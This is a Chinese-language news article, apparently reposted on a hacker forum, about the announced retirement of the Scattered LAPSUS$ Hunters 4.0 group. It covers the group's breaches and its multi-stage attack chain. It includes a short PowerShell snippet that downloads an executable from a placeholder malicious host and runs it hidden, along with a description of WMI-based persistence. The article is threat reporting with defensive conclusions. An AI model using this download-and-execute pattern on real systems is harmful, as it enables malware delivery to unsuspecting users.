9 月 8 日,“零散 LAPSUS(猎人4.0”(Scattered LAPSUS) Hunters 4.0)组织的 Telegram 频道突然发布一份明确声明,宣布将立即终止所有公开运营活动。
在数月间针对大型企业与关键基础设施发起多起高调攻击后,该黑客团体正式宣告 “永久隐退”。这一意外决定在网络安全圈引发广泛震动,分析师们纷纷开始重新评估该组织的 “活动遗产”,以及其停运对防御同类威胁的深远影响。
该组织最早于 2024 年初崭露头角,凭借对云服务与企业网络漏洞的利用获得关注。他们结合社会工程学、凭证窃取技术与复杂工具,成功从科技巨头、金融机构及交通服务提供商处窃取大量数据。
DataBreaches 网站的分析师指出,该组织攻击活动采用 “模块化架构”,能快速适配企业不断升级的防御措施 —— 即便目标机构加强了安全防护,他们仍能持续推进攻击,维持威胁态势。
影响评估显示,“零散 LAPSUS$ 猎人 4.0” 曾迫使开云集团(Kering)、Salesforce 等企业紧急披露漏洞;其攻击导致受害企业生产停滞,不得不紧急推送补丁修复漏洞,仅补救措施就造成数百万美元损失。
除经济损失外,被盗数据的公开泄露还严重削弱了公众对企业网络安全体系的信任。许多企业的安全团队表示,正是这些数据泄露事件成为 “转折点”,促使他们加速部署零信任架构,并完善事件响应预案。
在该组织宣布停运后,DataBreaches 的研究人员在其归档的攻击载荷中发现了定制脚本残留,这些脚本包含高级混淆程序。
这些混淆程序采用 “多态技术”,通过对代码片段进行迭代加密,规避基于特征码的检测工具。此类技术的复杂程度表明,该组织的运营安全水平与规划能力,远超同等规模的其他网络犯罪团体。
“零散 LAPSUS$ 猎人 4.0” 之所以能屡屡得手,核心在于其 “多阶段攻击机制”:
初始入侵通常始于 “鱼叉式钓鱼邮件”—— 邮件中附带包含恶意宏代码的 Office 文档。宏代码执行后,会启动一个 PowerShell 加载器,进而获取轻量级下载器。
随后,下载器会获取一个基于 C# 编写的攻击载荷,该载荷利用 Windows 管理规范(WMI)实现隐蔽执行,关键代码片段如下:
$DownloadUrl = "https://malicious.example/payload.exe"
$Output = "$env:TEMP\payload.exe"
Invoke-WebRequest -Uri $DownloadUrl -OutFile $Output
Start-Process -FilePath $Output -WindowStyle Hidden
攻击载荷执行后,会将自身注册为 “WMI 事件订阅”,通过 “系统启动时自动触发” 的方式实现持久化驻留。
由于该恶意软件与 Windows 合法服务深度整合,因此在进程列表与网络日志中几乎不会留下异常痕迹。
这一攻击链也凸显了 “多层防御” 的重要性 —— 企业需同时部署邮件过滤、宏代码限制与终端持续监控等措施,才能有效抵御此类威胁。
版权声明·<<<---红客联盟--->>>·免责声明
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
联系我们:admin@chnhonker.com
